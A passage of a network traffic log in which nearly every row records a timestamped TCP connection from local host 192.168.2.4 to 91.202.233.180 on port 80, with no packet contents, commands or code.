Apr 14, 2024 08:45:43.764774084 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.764774084 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.764811993 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.764811993 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.764852047 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.764852047 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.764888048 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.764888048 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.764925957 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.764925957 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.764966965 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.764966965 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765003920 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765003920 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765048027 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765048027 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765101910 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765101910 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765151024 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765151024 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765173912 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765173912 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765216112 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765216112 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765273094 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765273094 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765316010 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765316010 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765367985 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765367985 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765414000 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765414000 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765450001 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765450001 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765486002 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765486002 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765526056 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765526056 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765573978 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765573978 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765613079 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765613079 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765675068 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765675068 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765713930 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765713930 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765753984 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765753984 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765789986 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765789986 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765826941 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765826941 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765878916 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765878916 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765919924 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765919924 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765961885 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.765961885 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766001940 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766002893 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766041040 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766041040 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766077042 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766077042 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766123056 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766123056 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766170025 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766170025 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766210079 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766210079 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766263962 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766263962 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766314030 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766314030 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766355991 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766355991 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766402960 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766402960 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766442060 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766442060 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766479015 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766479015 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766515017 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766515017 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766556025 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766556025 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766598940 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766598940 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766647100 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766647100 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766685963 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766685963 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766721964 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766721964 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766762018 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766762018 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766794920 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766794920 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766808033 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.766838074 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766838074 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766871929 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766872883 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766897917 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766952038 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.766952038 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767013073 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767024040 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767024040 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767062902 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767062902 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767097950 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767097950 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767137051 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767137051 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767179966 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767179966 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767229080 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767229080 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767272949 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767272949 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767304897 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767304897 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767338991 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767338991 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767385960 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767385960 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767421007 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767421007 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767473936 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767473936 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767509937 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767509937 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767549038 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767549038 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767585993 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767585993 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767621994 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767621994 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767669916 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767669916 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767709970 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767709970 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767749071 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767749071 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767784119 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767784119 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767818928 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767819881 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767863035 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767863035 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767899036 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767899036 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767932892 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767932892 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767966986 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.767966986 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768007040 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768007040 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768044949 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768044949 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768080950 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768080950 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768141985 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768141985 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768182039 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768182039 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768214941 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768214941 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768259048 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768259048 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768301964 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768301964 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768340111 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768340111 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768381119 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768381119 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768435001 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768435001 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768474102 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768474102 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768517971 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768517971 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768557072 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768557072 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768605947 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768605947 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768629074 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768629074 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768667936 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768667936 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768703938 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768704891 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768754005 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768754005 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768786907 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768786907 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768826008 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768826008 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768861055 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768861055 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768898010 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768898010 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768930912 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768930912 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768968105 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.768968105 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769007921 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769007921 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769047976 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769048929 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769084930 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769084930 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769124031 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769124031 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769159079 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769159079 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769201994 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769201994 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769232035 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769232035 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769273043 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769273043 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769314051 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769314051 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769362926 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769362926 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769399881 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769399881 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769437075 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769437075 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769469976 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769469976 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769516945 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769516945 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769563913 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769563913 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769612074 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769612074 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769649982 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769649982 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769686937 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769686937 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769722939 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769722939 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769761086 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769762039 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769804955 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769804955 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769846916 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769846916 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769885063 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769886017 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769923925 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769923925 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769958019 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769958019 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769996881 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.769996881 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770032883 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770032883 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770070076 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770070076 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770106077 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770106077 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770133018 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770162106 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770162106 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770200968 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770200968 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770236015 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770236015 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770282030 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770282030 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770318031 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770318031 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770358086 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770358086 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770405054 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770406008 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770459890 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770459890 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770497084 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770497084 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770535946 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770535946 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770582914 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770582914 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770621061 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770621061 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770668983 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770668983 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770709038 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770709038 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770746946 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770746946 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770787001 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770787001 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770822048 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770822048 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770869017 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770869017 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770905972 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770905972 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770941973 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770941973 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770983934 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.770983934 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771020889 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771020889 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771063089 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771063089 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771100044 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771100044 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771138906 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771138906 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771174908 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771174908 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771214962 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771214962 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771253109 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771253109 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771292925 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771292925 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771327972 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771327972 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771368980 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771368980 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771405935 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771405935 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771441936 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771441936 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.771482944 CEST	49743	80	192.168.2.4	91.202.233.180
